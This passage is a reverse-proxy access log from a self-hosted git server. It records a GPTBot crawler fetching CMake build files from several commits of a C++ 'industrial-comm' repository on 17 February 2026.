+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11371] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10243] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11312] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11288] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11311] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11329] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11328] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11657] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16059] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10027] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10025] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10364] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10016] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10009] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10016] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10300] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10013] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10012] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:34:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10008] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:34:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10300] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:34:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10274] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:34:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10274] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:34:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10675] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:34:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:34:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:34:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10243] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:34:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:34:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:34:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10364] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:34:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:34:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14923] [Gzip 9.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:34:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:34:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:34:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:34:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11655] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16058] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10236] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10238] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11733] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:34:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11733] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:34:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11304] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:34:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11305] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 